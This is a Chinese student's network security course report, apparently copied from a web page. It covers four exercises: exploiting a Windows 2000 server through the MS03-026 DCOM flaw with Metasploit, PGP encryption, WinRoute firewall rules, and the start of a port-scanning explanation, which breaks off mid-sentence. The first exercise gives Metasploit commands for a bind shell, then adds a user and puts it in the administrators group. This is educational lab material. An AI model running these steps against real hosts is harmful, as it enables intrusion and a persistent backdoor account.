秦文陡 10515140263 络安全课程设计
《计算机 络安全》课程设计
学院:软件学院
班级:12级 工二班
姓名:秦文陡
学 :105151140263
指导老师:林玉香
1)利用metasploit攻击一台装有IIS5.0的WINDOWS 2000服务器,获得其控制权,并且在其上面建立超级用户,写出整个实施过程。
1、安装metasploit软件,安装完成后打开软件的控制台窗口
2、在窗口控制台界面输入命令“info exploit/windows/dcerpc/ms03_026_dcom”以了解该命令的用法
3、输入命令“use exploit/windows/dcerpc/ms03_026_dcom”使用该程序
4、输入命令“set rhost 目的主机ip地址”
5、输入命令“set PAYLOAD generic/shell_bind_tcp”加载运行程序需要的shellcode
6、输入命令“exploit”执行
7、现在已经进入了目的主机的dos控制界面,输入命令“net user 用户名 密码 / add”添加用户
输入命令“net localgroup 用户名 /add”将用户添加到管理员组
2)使用PGP 加密文件、加密邮件,写出详细的实施过程。
1、安装pgp软件,在安装中选中“NO,i’m a New User”然后“next”至电脑重启
2、由于是第一次安装运行该软件,电脑重启后该软件会自动提示你建立PGP密钥
3、 点击按钮“下一步”,在用户信息对话框中输入相应的姓名和电子邮件地址
4、 在PGP密码输入框中输入8位以上的密码并确认,然后PGP会自动产生PGP密钥
5、 使用PGP可以加密本地文件,右击要加密的文件,选择PGP菜单项的菜单“Encrypt”
6、 系统自动出现对话框,让用户选择要使用的加密密钥,选中一个密钥,点击按钮“OK”
7、 加密邮件:打开outlook,利用Outlook建立邮件,可以选择利用PGP进行加密和签名
3)利用WinRoute对你的主机设置禁用ping探测、禁用FTP访问及禁用HTTP访问,写出详细的实施过程
1、安装winroute软件,安装完成后。以管理员身份运行该软件,初始密码为空
2、该软件运行后,主机将不能上 ,点击工具栏图标,出现本地 络设置对话框,然后查看“Ethernet”的属性,将两个复选框全部选中
3、开始创建规则:选择菜单项“Packet Filter”,选中 卡,右击创建新规则,出现过滤规则添加对话框
4、因为“Ping”指令用的协议是ICMP,所以这里要对ICMP协议设置过滤规则。在协议下拉列表中选择“ICMP”
5、在“ICMP Type”栏目中,将复选框全部选中。在“Action”栏目中,选择单选框“Drop”。在“Log Packet”栏目中选中“Log into Window”,创建完毕后点击按钮“OK”,一条规则就创建完毕
6、在物理机上“ping”虚拟机后,再选择菜单栏“View”下的菜单项“Logs>Security Logs”,察看日志纪录
7、FTP服务用TCP协议, FTP占用TCP的21端口,配置如下:
8. HTTP服务用TCP协议,占用TCP协议的80端口,配置如下:
9、完成后在物理机用浏览器访问虚拟机,查看日志记录:
4)实现端口扫描的程序可以使用TCP协议和UDP协议,原理是通过Socket连接对方的计算机的某端口,试图和该端口建立连接,如果建立成功,就说明对方开放了该端口,如果失败了,就说明对方没有开放该端口,利用UDP协议实现端口扫描(写出程序代码)。
窗体底端
利用TCP和UDP协议
TCP
TCP (Transmission Control Protocol)属于传输层协议。其中TCP提供IP环境下的数据可靠传输,它提供的服务包括数据流传送、可靠性、有效流控、全双工操作和多路复用。通过面向连接、端到端和可靠的数据包发送。通俗说,TCP支持的应用协议主要有:Telnet、FTP、SMTP等
TCP是面向对象的连接,是安全可靠的,是基于连接的协议,也就是说,在正式收发数据前,必须和对方建立可靠的连接。一个TCP连接必须要经过三次“对话”才能建立起来,其中的过程非常复杂,我 们这里只做简单、形象的介绍,你只要做到能够理解这个过程即可。我们来看看这三次对话的简单过程:主机A向主机B发出连接请求数据包:“我想给你发数据,
文章知识点与官方知识档案匹配,可进一步学习相关知识 络技能树首页概览22784 人正在系统学习中 相关资源:点石排名软件-快速提升关键字排名-电子商务工具类资源-CSDN文库
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!